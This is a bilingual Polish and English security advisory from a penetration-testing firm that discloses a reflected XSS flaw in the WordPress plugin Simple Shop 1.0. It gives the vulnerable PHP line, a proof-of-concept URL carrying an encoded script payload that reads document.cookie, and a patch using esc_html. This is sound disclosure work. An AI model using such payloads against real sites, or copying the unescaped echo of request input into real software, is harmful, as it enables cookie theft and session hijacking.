WND-RPSL.03.02.00-24-02D8/20-002 (WNIOSEK UE)
Udoskonalenie usługi hostingu serwerów wirtualnych wraz z dodaniem do niej usług zwiększających bezpieczeństwo danych
Suma projektu 3 689 508,00 PLN (kliknij, aby przeczytać więcej)

Pentesterzy Zdalny Admin odkryli XSS w pluginie WordPress

Podczas prowadzonych testów penetracyjnych badacze z firmy Zdalny Admin odnaleźli błąd typu Reflected XSS w publicznie dostępnym pluginie dla platformy blogowej WordPress.
Podatnośc Cross Site Scripting znajduje się w pluginie WordPress Simple Shop w wersji 1.0 (najnowsza dostępna wersja).

Podatny kod:
webful-simple-grocery-shop/includes/add_category.php:80:<input type="hidden" name="food_id_id" value="<?php echo $_GET['update_row']; ?>" />

Przykład wykorzystania XSS Reflected:
http://[site]/wp-admin/admin.php?page=add_category&update_row=%22%3E+%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E

 

(During the penetration tests conducting by Zdalny Admin, researchers found bug Reflected XSS type in a publicly available plugin for the WordPress blogging platform.
Susceptibility Cross Site Scripting is in a WordPress plugin Simple Shop in version 1.0 (the latest version available).

Susceptible code:
webful-simple-grocery-shop/includes/add_category.php:80:<input type="hidden" name="food_id_id" value="<?php echo $_GET['update_row']; ?>" />

An example of using XSS Reflected :
http://[site]/wp-admin/admin.php?page=add_category&update_row=%22%3E+%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E )

 

 

 

Poniżej prezentujemy łatkę, która można zastosować zanim autor pluginu wyda poprawioną wersję:
webful-simple-grocery-shop/includes/add_category.php:80:<input type="hidden" name="food_id_id" value="<?php echo esc_html($_GET['update_row']); ?>" />

 

Below we present a patch that can be applied before the plugin author will release a revised version:
webful-simple-grocery-shop/includes/add_category.php:80:<input type="hidden" name="food_id_id" value="<?php echo esc_html($_GET['update_row']); ?>" />